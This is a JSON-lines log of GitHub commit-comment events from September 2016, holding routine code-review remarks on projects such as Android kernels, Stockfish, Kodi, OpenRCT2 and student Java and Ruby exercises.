{"id":"4512092297","type":"CommitCommentEvent","actor":{"login":"Seeebastian"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18889996,"position":null,"line":null,"path":null,"commit_id":"3bb0b0ef961a8d0f0e229f9f5e26cec5ac3a4fa5","created_at":"2016-09-03T12:25:45Z","updated_at":"2016-09-03T12:25:45Z","body":"Did #15 and partly #7"}},"created_at":"2016-09-03T12:25:45Z"}
{"id":"4512093670","type":"CommitCommentEvent","actor":{"login":"alesaiko"},"repo":{"name":"alesaiko/kernel_msm"},"payload":{"comment":{"id":18889998,"position":null,"line":null,"path":null,"commit_id":"8b468160010cd8d104770cc9037e2ea108870937","created_at":"2016-09-03T12:27:05Z","updated_at":"2016-09-03T12:27:05Z","body":"So, I made this on my local repo\r\n```\r\nstatic ssize_t sound_control_enabled_store(struct kobject *kobj,\r\n\t\tstruct kobj_attribute *attr, const char *buf, size_t count)\r\n{\r\n\tunsigned int val;\r\n\r\n\tsscanf(buf, \"%d\", &val);\r\n\r\n\tif (val > 1)\r\n\t\tval = 1;\r\n\r\n\tsnd_ctrl_enabled = val;\r\n\r\n\treturn count;\r\n}\r\n```\r\nAnd it seems to work properly: All the values, except 0, will set it to 1."}},"created_at":"2016-09-03T12:27:05Z"}
{"id":"4512094136","type":"CommitCommentEvent","actor":{"login":"fred777"},"repo":{"name":"CyanogenMod/android_kernel_motorola_omap4-common"},"payload":{"comment":{"id":18889999,"position":null,"line":null,"path":null,"commit_id":"3c2e7737e24a4b1a49367ff991c5458fc4bc4d3f","created_at":"2016-09-03T12:27:30Z","updated_at":"2016-09-03T12:27:30Z","body":"@stargo: Why did you revert these changes, especially lowmemorykiller.c, line 126, substraction of totalreserve_pages from other_free ?\r\n\r\nOfficial Google Source (3.4 kernel) does substract totalreserve_pages: https://android.googlesource.com/kernel/common/+/android-3.4/drivers/staging/android/lowmemorykiller.c\r\n\r\n(I'm just trying to find out the cause for UX freezes / lags and I suspect it's due to lowmemorykiller interfering with zram and kswapd direct reclaim...)\r\n\r\nFYI - here is a 3.0 backport of some lmk/zram improvements: https://github.com/jollaman999/jolla-kernel_G_Gen2/commit/60d2eac17a1f142f554de628eb8532566cd93926"}},"created_at":"2016-09-03T12:27:30Z"}
{"id":"4512094510","type":"CommitCommentEvent","actor":{"login":"FrancYescO"},"repo":{"name":"jabbink/PokemonGoBot"},"payload":{"comment":{"id":18890000,"position":38,"line":38,"path":"src/main/kotlin/ink/abb/pogo/scraper/services/BotService.kt","commit_id":"3c134965b84a9d6199c54f9496f20810b314c73e","created_at":"2016-09-03T12:27:51Z","updated_at":"2016-09-03T12:27:51Z","body":"I think its here to write def value, and reformat the file style"}},"created_at":"2016-09-03T12:27:51Z"}
{"id":"4512095791","type":"CommitCommentEvent","actor":{"login":"grgrzybek"},"repo":{"name":"ops4j/org.ops4j.pax.web"},"payload":{"comment":{"id":18890002,"position":null,"line":null,"path":null,"commit_id":"72b90afc54c4b6840e41e8eeac23fb0a5562f453","created_at":"2016-09-03T12:29:07Z","updated_at":"2016-09-03T12:29:07Z","body":"@ANierbeck can you point me to document describing what does and what doesn't require version upgrade (major, minor).\r\nI didn't expect that semantic OSGi versioning requires minor version upgrade after changing implementation of ThreadFactory..."}},"created_at":"2016-09-03T12:29:07Z"}
{"id":"4512096101","type":"CommitCommentEvent","actor":{"login":"binkybear"},"repo":{"name":"offensive-security/nethunter-devices"},"payload":{"comment":{"id":18890003,"position":null,"line":null,"path":null,"commit_id":"5deaba4fb9891d2dee4777c96179b4dfa05443a2","created_at":"2016-09-03T12:29:21Z","updated_at":"2016-09-03T12:29:21Z","body":"You won't be able to get wifi working.  It's set to monitor mode by default.  If you run tcpdump wlan0 you can see its capturing everything.\r\n\r\nI haven't found a good way to include it with Nethunter."}},"created_at":"2016-09-03T12:29:21Z"}
{"id":"4512096760","type":"CommitCommentEvent","actor":{"login":"FrederickChan"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":18890005,"position":null,"line":null,"path":null,"commit_id":"467b01fae2a86dde4c1bd10a81103906929b8297","created_at":"2016-09-03T12:29:59Z","updated_at":"2016-09-03T12:29:59Z","body":"Which is not compat? I updated datepicker, which is still at fault?"}},"created_at":"2016-09-03T12:29:59Z"}
{"id":"4512097085","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":18890007,"position":38,"line":36,"path":"band-service/src/main/java/hu/schonherz/training/band/service/impl/BandServiceImpl.java","commit_id":"e39301cd887b55baceb826412361858bb7908893","created_at":"2016-09-03T12:30:15Z","updated_at":"2016-09-03T12:30:15Z","body":"This could be condensed to only one line :)"}},"created_at":"2016-09-03T12:30:15Z"}
{"id":"4512097666","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":18890008,"position":47,"line":45,"path":"band-service/src/main/java/hu/schonherz/training/band/service/impl/BandServiceImpl.java","commit_id":"e39301cd887b55baceb826412361858bb7908893","created_at":"2016-09-03T12:30:41Z","updated_at":"2016-09-03T12:30:41Z","body":"And this as well."}},"created_at":"2016-09-03T12:30:41Z"}
{"id":"4512097740","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"koquantam/android_device_samsung_grandprimeve3g"},"payload":{"comment":{"id":18890009,"position":null,"line":null,"path":null,"commit_id":"d4e31a4938d1898df7d2e6d89b9a9a6cb3791130","created_at":"2016-09-03T12:30:43Z","updated_at":"2016-09-03T12:30:43Z","body":"It works for vivalto3gvn kernel.\n\n2016-09-03 19:18 GMT+07:00 Nguyễn Tuấn Quyền <notifications@github.com>:\n\n> Bro, that kernel defconfig flag is useless. Just try recompile the kernel\n> without modifying that flag and you'll know\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/koquantam/android_device_samsung_grandprimeve3g/commit/d4e31a4938d1898df7d2e6d89b9a9a6cb3791130#commitcomment-18889957>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJOl9nOJdtq2YHqMTpuDxBgQoPB3aOdXks5qmWWzgaJpZM4J0RMT>\n> .\n>\n"}},"created_at":"2016-09-03T12:30:43Z"}
{"id":"4512097884","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":18890010,"position":56,"line":54,"path":"band-service/src/main/java/hu/schonherz/training/band/service/impl/BandServiceImpl.java","commit_id":"e39301cd887b55baceb826412361858bb7908893","created_at":"2016-09-03T12:30:52Z","updated_at":"2016-09-03T12:30:52Z","body":"This too. :)"}},"created_at":"2016-09-03T12:30:52Z"}
{"id":"4512098379","type":"CommitCommentEvent","actor":{"login":"FrederickChan"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":18890011,"position":null,"line":null,"path":null,"commit_id":"6d8fdc6e7fff9ed29ed300094060b344cb35e167","created_at":"2016-09-03T12:31:18Z","updated_at":"2016-09-03T12:31:18Z","body":":+1: "}},"created_at":"2016-09-03T12:31:18Z"}
{"id":"4512099300","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18890012,"position":null,"line":null,"path":null,"commit_id":"9ada5542c359db68a701a845e1e1c1bb30fe96b6","created_at":"2016-09-03T12:32:14Z","updated_at":"2016-09-03T12:32:14Z","body":"Yeah I know I sound cool. But, again, I did not work. Sorry."}},"created_at":"2016-09-03T12:32:14Z"}
{"id":"4512099459","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":18890013,"position":16,"line":16,"path":"band-service/src/main/java/hu/schonherz/training/band/service/mapper/BandMapper.java","commit_id":"e39301cd887b55baceb826412361858bb7908893","created_at":"2016-09-03T12:32:23Z","updated_at":"2016-09-03T12:32:23Z","body":"Utility classes with only static methods should be `final` and should contain a private constructor. There is no point in creating an instance of them or extending them."}},"created_at":"2016-09-03T12:32:23Z"}
{"id":"4512100191","type":"CommitCommentEvent","actor":{"login":"xgqfrms"},"repo":{"name":"xgqfrms/cdn"},"payload":{"comment":{"id":18890014,"position":null,"line":null,"path":null,"commit_id":"5988c313edee7944ad01008870a03ff02b56276e","created_at":"2016-09-03T12:33:05Z","updated_at":"2016-09-03T12:33:05Z","body":"placeholder/x.png "}},"created_at":"2016-09-03T12:33:05Z"}
{"id":"4512100212","type":"CommitCommentEvent","actor":{"login":"sh8"},"repo":{"name":"ttccddtoki/achieve"},"payload":{"comment":{"id":18890015,"position":20,"line":24,"path":"db/seeds.rb","commit_id":"fd3ebc03bdd6e17c2f72af2343efc09a8b49f4c9","created_at":"2016-09-03T12:33:07Z","updated_at":"2016-09-03T12:33:07Z","body":"```\r\nfor num in 1..100 do\r\n   Blog.create(\r\n     title: \"あああ\",\r\n     user_id: num\r\n   )\r\nend\r\n```\r\n\r\nの方がいいよ〜"}},"created_at":"2016-09-03T12:33:07Z"}
{"id":"4512100271","type":"CommitCommentEvent","actor":{"login":"ANierbeck"},"repo":{"name":"ops4j/org.ops4j.pax.web"},"payload":{"comment":{"id":18890016,"position":null,"line":null,"path":null,"commit_id":"72b90afc54c4b6840e41e8eeac23fb0a5562f453","created_at":"2016-09-03T12:33:10Z","updated_at":"2016-09-03T12:33:10Z","body":"@grgrzybek see also here: https://www.osgi.org/wp-content/uploads/SemanticVersioning.pdf\r\n"}},"created_at":"2016-09-03T12:33:10Z"}
{"id":"4512101311","type":"CommitCommentEvent","actor":{"login":"RobiNN1"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":18890018,"position":null,"line":null,"path":null,"commit_id":"467b01fae2a86dde4c1bd10a81103906929b8297","created_at":"2016-09-03T12:34:00Z","updated_at":"2016-09-03T12:34:00Z","body":"More components not working with JQuery v3"}},"created_at":"2016-09-03T12:34:00Z"}
{"id":"4512103001","type":"CommitCommentEvent","actor":{"login":"sh8"},"repo":{"name":"ttccddtoki/achieve"},"payload":{"comment":{"id":18890020,"position":20,"line":19,"path":"app/controllers/contacts_controller.rb","commit_id":"a329af0ffc61f02b8a852b8f0472c413dac59b3b","created_at":"2016-09-03T12:35:31Z","updated_at":"2016-09-03T12:35:31Z","body":"deliverはdeprecatedだからdeliver_nowを使うと良いよ〜"}},"created_at":"2016-09-03T12:35:31Z"}
{"id":"4512103297","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":18890022,"position":null,"line":null,"path":null,"commit_id":"1bd270ddd7547b91b763600cae0e10afbdcb61d0","created_at":"2016-09-03T12:35:48Z","updated_at":"2016-09-03T12:35:48Z","body":"It should be just fine."}},"created_at":"2016-09-03T12:35:48Z"}
{"id":"4512104914","type":"CommitCommentEvent","actor":{"login":"mrpeny"},"repo":{"name":"mrpeny/walmagERP"},"payload":{"comment":{"id":18890024,"position":11,"line":11,"path":"src/main/java/hu/walmag/erp/services/Dao.java","commit_id":"21f4e09b835e28bd5c0291faab1ae247905c829a","created_at":"2016-09-03T12:37:14Z","updated_at":"2016-09-03T12:37:14Z","body":"Do you mean WalmagDao would be better?"}},"created_at":"2016-09-03T12:37:14Z"}
{"id":"4512105079","type":"CommitCommentEvent","actor":{"login":"sh8"},"repo":{"name":"ttccddtoki/achieve"},"payload":{"comment":{"id":18890026,"position":12,"line":17,"path":"app/mailers/notice_mailer.rb","commit_id":"a329af0ffc61f02b8a852b8f0472c413dac59b3b","created_at":"2016-09-03T12:37:23Z","updated_at":"2016-09-03T12:37:23Z","body":"インデントが…\r\nmail(to: user.email, subject: \"お問い合わせ完了しました\")"}},"created_at":"2016-09-03T12:37:23Z"}
{"id":"4512105691","type":"CommitCommentEvent","actor":{"login":"sin"},"repo":{"name":"pyziunhhc/HangManHead"},"payload":{"comment":{"id":18890027,"position":143,"line":100,"path":"js/hangman.js","commit_id":"17033fda804996b444d10d22ab7d755924bbcc76","created_at":"2016-09-03T12:37:57Z","updated_at":"2016-09-03T12:37:57Z","body":"Wystarczy sprawdzić jedną zmienną. Jeśli litera znajduje się w słowie zawsze obydwie będą >= 0, jeśli nie znajduje się w słowie obydwie będą -1."}},"created_at":"2016-09-03T12:37:57Z"}
{"id":"4512106343","type":"CommitCommentEvent","actor":{"login":"mrpeny"},"repo":{"name":"mrpeny/walmagERP"},"payload":{"comment":{"id":18890028,"position":12,"line":12,"path":"src/main/java/hu/walmag/erp/services/Dao.java","commit_id":"21f4e09b835e28bd5c0291faab1ae247905c829a","created_at":"2016-09-03T12:38:31Z","updated_at":"2016-09-03T12:38:31Z","body":"Should I use protected access modifier instead?"}},"created_at":"2016-09-03T12:38:31Z"}
{"id":"4512106806","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":18890029,"position":27,"line":27,"path":"band-service/src/main/java/hu/schonherz/training/band/service/mapper/BandMapper.java","commit_id":"e39301cd887b55baceb826412361858bb7908893","created_at":"2016-09-03T12:38:56Z","updated_at":"2016-09-03T12:38:56Z","body":"Where did you copied it from?\r\nWere are dealing with JPA entities here, not Data Transfer Objects in the sense of the DAO pattern.\r\nRename this method accordingly."}},"created_at":"2016-09-03T12:38:56Z"}
{"id":"4512107530","type":"CommitCommentEvent","actor":{"login":"PhantomAssassin12"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18890031,"position":null,"line":null,"path":null,"commit_id":"9ada5542c359db68a701a845e1e1c1bb30fe96b6","created_at":"2016-09-03T12:39:34Z","updated_at":"2016-09-03T12:39:34Z","body":"Okay. Cool I will wait for the CM14/AOSP7 for galaxy v."}},"created_at":"2016-09-03T12:39:34Z"}
{"id":"4512107993","type":"CommitCommentEvent","actor":{"login":"sin"},"repo":{"name":"pyziunhhc/HangManHead"},"payload":{"comment":{"id":18890032,"position":145,"line":102,"path":"js/hangman.js","commit_id":"17033fda804996b444d10d22ab7d755924bbcc76","created_at":"2016-09-03T12:39:59Z","updated_at":"2016-09-03T12:39:59Z","body":"Jeśli litera znajduje się w słowie jeden raz, to dwa razy ją wstawiasz w tym samym miejscu.\r\nJeśli litera znajduje się w słowie dwa razy, to wstawiasz obydwie.\r\nJeśli litera znajduje się w słowie trzy lub więcej razy to wstawiasz tylko pierwszą i ostatnią, a środkowe nie zostają odkryte."}},"created_at":"2016-09-03T12:39:59Z"}
{"id":"4512108980","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":18890034,"position":null,"line":null,"path":null,"commit_id":"e39301cd887b55baceb826412361858bb7908893","created_at":"2016-09-03T12:40:48Z","updated_at":"2016-09-03T12:40:48Z","body":"Furthermore, the project does not build.\r\n**Never** push something does not even build successfully."}},"created_at":"2016-09-03T12:40:48Z"}
{"id":"4512109273","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":18890035,"position":null,"line":null,"path":null,"commit_id":"2331e218dc88408c5cb2db9a7b5f9ebbed82e2d6","created_at":"2016-09-03T12:41:02Z","updated_at":"2016-09-03T12:41:02Z","body":"@Rocky640 You're right, 12222 +- 60 would have no effect. But the starting delta is 175, and after each iteration is decreasing until reaching 60 in the end ...\r\nNevertheless, 60 is chosen too small because delta is decreasing much faster during the first thousands of iterations.\r\n\r\nBut I like the idea of tuning the index for the array lookup. There are 375 unique combinations if I'm not wrong. I think I will go for that solution.\r\nThanks for the heads up!"}},"created_at":"2016-09-03T12:41:02Z"}
{"id":"4512110289","type":"CommitCommentEvent","actor":{"login":"sin"},"repo":{"name":"pyziunhhc/HangManHead"},"payload":{"comment":{"id":18890037,"position":4,"line":112,"path":"js/hangman.js","commit_id":"69bd32270fb01da4d511fcc9eea1322be437db7d","created_at":"2016-09-03T12:41:50Z","updated_at":"2016-09-03T12:41:50Z","body":"Znowu jakieś dziwne wcięcia.\r\nCtrl+Alt+L w WebStormie aby zreformatować kod.\r\nUżywaj litera. "}},"created_at":"2016-09-03T12:41:50Z"}
{"id":"4512112534","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18890040,"position":null,"line":null,"path":null,"commit_id":"7eb91c6290cf6f6b0d84c8e8a55d92d6fc650549","created_at":"2016-09-03T12:43:47Z","updated_at":"2016-09-03T12:43:47Z","body":"When we use MP3 2 channels i guess that no one expect any high quality standard, and whatever every mathematical comparaison said, did users make any listening difference between a lossy 256k or 320k transcoding ?\r\n\r\nThat's said, use LPCM will be the best choice, IMHO, when it come to transcode lossy to lossy audio formats; mandotory supported by devices and DLNA standard as well.\r\n\r\nI apologize if my comment is inappropriate."}},"created_at":"2016-09-03T12:43:47Z"}
{"id":"4512112602","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"HenriqueMaiani/EDL"},"payload":{"comment":{"id":18890041,"position":null,"line":null,"path":null,"commit_id":"0b421cddfbb620b9cac184c3d1eee4bb1d04b296","created_at":"2016-09-03T12:43:51Z","updated_at":"2016-09-03T12:43:51Z","body":"Os códigos continuam aparecendo sem indentação:\r\nhttps://github.com/HenriqueMaiani/EDL/blob/0b421cddfbb620b9cac184c3d1eee4bb1d04b296/trabalhos/trabalho-01/ARTIGO.md\r\n\r\nDê uma olhada nesse link:\r\nhttps://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet#code"}},"created_at":"2016-09-03T12:43:51Z"}
{"id":"4512113872","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18890044,"position":null,"line":null,"path":null,"commit_id":"9ada5542c359db68a701a845e1e1c1bb30fe96b6","created_at":"2016-09-03T12:44:54Z","updated_at":"2016-09-03T12:44:54Z","body":"I have a typo. I did not want to say \"I\" but \"it's\". Sorry again :D"}},"created_at":"2016-09-03T12:44:54Z"}
{"id":"4512114484","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18890045,"position":null,"line":null,"path":null,"commit_id":"7eb91c6290cf6f6b0d84c8e8a55d92d6fc650549","created_at":"2016-09-03T12:45:25Z","updated_at":"2016-09-03T12:45:25Z","body":"I have to agree with @SubJunk, I'd want as little degradation as possible. I'd say that I'm not even sure if the picture quality is more important than the audio quality for me. Also, it's hard to imagine that encoding 320kbps MP3 is even noticeable compared to the video encoding (where that apply). Much the same goes for bandwidth, the total is so small compared to the video that it's hard to imagine that you would gain much video quality from the little you could spare by \"cheaping\" on the audio quality.\r\n\r\nThere would have to be some CPU vs bandwidth setting that controlled this if it should make much sense."}},"created_at":"2016-09-03T12:45:25Z"}
{"id":"4512116732","type":"CommitCommentEvent","actor":{"login":"nicklauslittle"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18890046,"position":4,"line":35,"path":"xbmc/video/dialogs/GUIDialogVideoSettings.h","commit_id":"72cc33cfaa6af54c8bd0c15481fa8b172870e3c3","created_at":"2016-09-03T12:47:28Z","updated_at":"2016-09-03T12:47:28Z","body":"Globals? You mean I can't use static functions? How would you like me to do this?"}},"created_at":"2016-09-03T12:47:28Z"}
{"id":"4512118347","type":"CommitCommentEvent","actor":{"login":"cim1393"},"repo":{"name":"kristw/d3kit-timeline"},"payload":{"comment":{"id":18890048,"position":null,"line":null,"path":null,"commit_id":"85b248d64b846cc40dfc388ce9690541a45e6996","created_at":"2016-09-03T12:48:46Z","updated_at":"2016-09-03T12:48:46Z","body":"those codes in sample can be ran and get the right view,but I get wrong message when I use those sample codes in jquery enviroment,it said 'Error: Script error for: d3' ,and other three error on d3.js,labella.js and d3kit.js.\r\n\r\nthen I got error on d3-disptch.js,d3-***.js after I copy d3.js,labella.js and d3kit.js to the specifity path.\r\n\r\ncan you help me to solve this ? thanks."}},"created_at":"2016-09-03T12:48:46Z"}
{"id":"4512118673","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":18890050,"position":null,"line":null,"path":null,"commit_id":"2331e218dc88408c5cb2db9a7b5f9ebbed82e2d6","created_at":"2016-09-03T12:49:05Z","updated_at":"2016-09-03T12:49:05Z","body":"[space_thresholds_20160902.xlsx](https://github.com/joergoster/Stockfish/files/453372/space_thresholds_20160902.xlsx)\r\n"}},"created_at":"2016-09-03T12:49:05Z"}
{"id":"4512119802","type":"CommitCommentEvent","actor":{"login":"sgbhatt"},"repo":{"name":"sgbhatt/code-journey"},"payload":{"comment":{"id":18890052,"position":null,"line":null,"path":null,"commit_id":"cd62707ff958af97a0347203fda8a4cfc52b7f81","created_at":"2016-09-03T12:50:07Z","updated_at":"2016-09-03T12:50:07Z","body":"on september 3rd started coding."}},"created_at":"2016-09-03T12:50:07Z"}
{"id":"4512120595","type":"CommitCommentEvent","actor":{"login":"kysnm"},"repo":{"name":"sonots/embulk-filter-column"},"payload":{"comment":{"id":18890055,"position":11,"line":10,"path":"src/main/java/org/embulk/filter/column/path/PropertyPathToken.java","commit_id":"5aa4e77fafd03e4a5b16f3355406f9db13b85c09","created_at":"2016-09-03T12:50:45Z","updated_at":"2016-09-03T12:50:45Z","body":"sorry, mistake."}},"created_at":"2016-09-03T12:50:45Z"}
{"id":"4512121757","type":"CommitCommentEvent","actor":{"login":"nicklauslittle"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18890059,"position":43,"line":452,"path":"xbmc/video/dialogs/GUIDialogVideoSettings.cpp","commit_id":"72cc33cfaa6af54c8bd0c15481fa8b172870e3c3","created_at":"2016-09-03T12:51:45Z","updated_at":"2016-09-03T12:51:45Z","body":"I'm guessing you are referring to the return statements on the same line as the case label? Technically, a case label is not a statement, but I can move them if you really want."}},"created_at":"2016-09-03T12:51:45Z"}
{"id":"4512125230","type":"CommitCommentEvent","actor":{"login":"conorjohnston"},"repo":{"name":"conorjohnston/pyobd"},"payload":{"comment":{"id":18890062,"position":null,"line":null,"path":null,"commit_id":"7e8858ff01e87c5c9cbb1045869767731783f2f6","created_at":"2016-09-03T12:54:56Z","updated_at":"2016-09-03T12:54:56Z","body":"changed baud rate to match my hardware"}},"created_at":"2016-09-03T12:54:56Z"}
{"id":"4512126860","type":"CommitCommentEvent","actor":{"login":"dnomikos"},"repo":{"name":"Xiaomi-Miui-Hellas/MIUI-XML-8.0-Greek"},"payload":{"comment":{"id":18890065,"position":null,"line":null,"path":null,"commit_id":"11363ee37c069d9265183023d1d1f016249f54db","created_at":"2016-09-03T12:56:26Z","updated_at":"2016-09-03T12:56:26Z","body":"The pull request description must be in English so anyone can read it. Look at the commits tab as an example :)"}},"created_at":"2016-09-03T12:56:26Z"}
{"id":"4512128804","type":"CommitCommentEvent","actor":{"login":"marijnvdwerf"},"repo":{"name":"OpenRCT2/OpenRCT2"},"payload":{"comment":{"id":18890068,"position":60,"line":245,"path":"src/windows/guest_list.c","commit_id":"cb235c9d568db33e249b96046682edd95c2bb281","created_at":"2016-09-03T12:58:24Z","updated_at":"2016-09-03T12:58:24Z","body":"Curious. Why the anding instead of just passing an uint8?"}},"created_at":"2016-09-03T12:58:24Z"}
{"id":"4512128862","type":"CommitCommentEvent","actor":{"login":"pkeuter"},"repo":{"name":"CasparCG/Server"},"payload":{"comment":{"id":18890069,"position":null,"line":null,"path":null,"commit_id":"3244515935c97dc77516743c98d5cf9cd133258d","created_at":"2016-09-03T12:58:26Z","updated_at":"2016-09-03T12:58:26Z","body":"Nice, I was looking into this already :-) :+1: "}},"created_at":"2016-09-03T12:58:26Z"}
{"id":"4512130390","type":"CommitCommentEvent","actor":{"login":"squiter"},"repo":{"name":"pgt/emacs-dotfiles"},"payload":{"comment":{"id":18890071,"position":null,"line":null,"path":null,"commit_id":"137b9862610f13ae5b056b9f888fad7b84e8714a","created_at":"2016-09-03T12:59:55Z","updated_at":"2016-09-03T12:59:55Z","body":"You're welcome \\o\n\n\n*Brunno dos Santos*\nDesenvolvedor Ruby\nSkype: brunno.dos.santos\n\ngithub <http://github.com/squiter> | Stack Overflow\n<http://stackoverflow.com/users/937506/brunno-dos-santos> | @squiter\n<http://twitter.com/squiter> | facebook <http://facebook.com/squiter>\n\nOn Fri, Sep 2, 2016 at 4:33 PM, pgt <notifications@github.com> wrote:\n\n> Set project name in window name\n>\n> Thanks @squiter\n>\n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/pgt/emacs-dotfiles/commit/\n> 137b9862610f13ae5b056b9f888fad7b84e8714a\n>\n"}},"created_at":"2016-09-03T12:59:55Z"}
{"id":"4512130452","type":"CommitCommentEvent","actor":{"login":"nicklauslittle"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18890072,"position":13,"line":222,"path":"xbmc/video/windows/GUIWindowFullScreen.cpp","commit_id":"72cc33cfaa6af54c8bd0c15481fa8b172870e3c3","created_at":"2016-09-03T12:59:58Z","updated_at":"2016-09-03T12:59:58Z","body":"Agree that GUIDialogVideoSettings may not be the best to put these functions. I put it in there because the the GUIWindowFullScreen class already has dependencies on other GUI components, and I couldn't find anything better. (I didn't want to create a new class for 2 short static functions.) Do you have any suggestions?"}},"created_at":"2016-09-03T12:59:58Z"}
{"id":"4512131355","type":"CommitCommentEvent","actor":{"login":"1vanK"},"repo":{"name":"urho3d/Urho3D"},"payload":{"comment":{"id":18890074,"position":null,"line":null,"path":null,"commit_id":"000b1af6d733e6fca6854e0214b06455eb37ea89","created_at":"2016-09-03T13:00:34Z","updated_at":"2016-09-03T13:00:34Z","body":"Editor ignore obstacles, until Play Button is not pressed. It is correct?"}},"created_at":"2016-09-03T13:00:34Z"}
{"id":"4512134941","type":"CommitCommentEvent","actor":{"login":"deacix"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":18890078,"position":null,"line":null,"path":null,"commit_id":"52b4d4e4ed5569020e6926238cfb8038af6f00e0","created_at":"2016-09-03T13:03:43Z","updated_at":"2016-09-03T13:03:43Z","body":"maybe you can set variable for the docker image name"}},"created_at":"2016-09-03T13:03:43Z"}
{"id":"4512135252","type":"CommitCommentEvent","actor":{"login":"IntelOrca"},"repo":{"name":"OpenRCT2/OpenRCT2"},"payload":{"comment":{"id":18890079,"position":60,"line":245,"path":"src/windows/guest_list.c","commit_id":"cb235c9d568db33e249b96046682edd95c2bb281","created_at":"2016-09-03T13:03:58Z","updated_at":"2016-09-03T13:03:58Z","body":"I don't know, I didn't write this function originally."}},"created_at":"2016-09-03T13:03:58Z"}
{"id":"4512136136","type":"CommitCommentEvent","actor":{"login":"christosk92"},"repo":{"name":"christosk92/SomToday10"},"payload":{"comment":{"id":18890081,"position":null,"line":null,"path":null,"commit_id":"468df206991d0da9379ae367b521e2b6b27346d4","created_at":"2016-09-03T13:04:43Z","updated_at":"2016-09-03T13:04:43Z","body":"Copied the view model from my other projects so"}},"created_at":"2016-09-03T13:04:43Z"}
{"id":"4512136155","type":"CommitCommentEvent","actor":{"login":"v45k0"},"repo":{"name":"valo/maycamp_arena"},"payload":{"comment":{"id":18890082,"position":null,"line":null,"path":null,"commit_id":"075af31c4257f957c8a6d0703a4d6ad4f67b26a5","created_at":"2016-09-03T13:04:45Z","updated_at":"2016-09-03T13:04:45Z","body":"Isn't `--cpuset-cpus` the right parameter though? That's why I proposed to change it from `--cpuset` as [described here](https://github.com/valo/maycamp_arena/pull/123).\r\n\r\n"}},"created_at":"2016-09-03T13:04:45Z"}
{"id":"4512136309","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":18890083,"position":27,"line":112,"path":"src/utils/SparseLineGrid.h","commit_id":"3a06f49fba3c800ae9ef80e49e6e9acf50d4e561","created_at":"2016-09-03T13:04:52Z","updated_at":"2016-09-03T13:04:52Z","body":"x_cell_start is changed every time on line 110 in order to prevent the line being added to all cells in a triangle.\r\n\r\nI should have a better look at your comment \"I think you're right [...]\"\r\nIt's a bit too much detail to answer by phone."}},"created_at":"2016-09-03T13:04:52Z"}
{"id":"4512136464","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18890084,"position":null,"line":null,"path":null,"commit_id":"fc0b40328d4b1b284d9e00ba222687626d93cbef","created_at":"2016-09-03T13:05:00Z","updated_at":"2016-09-03T13:05:00Z","body":"This isn't really needed, as `mesa_glu` propagates `mesa_noglu`, but that doesn't matter ;-) See 38bd2c442."}},"created_at":"2016-09-03T13:05:00Z"}
{"id":"4512140379","type":"CommitCommentEvent","actor":{"login":"1vanK"},"repo":{"name":"urho3d/Urho3D"},"payload":{"comment":{"id":18890088,"position":null,"line":null,"path":null,"commit_id":"000b1af6d733e6fca6854e0214b06455eb37ea89","created_at":"2016-09-03T13:08:15Z","updated_at":"2016-09-03T13:08:15Z","body":"(I mean after Edit->Rebuild nav data, I should press play button)"}},"created_at":"2016-09-03T13:08:15Z"}
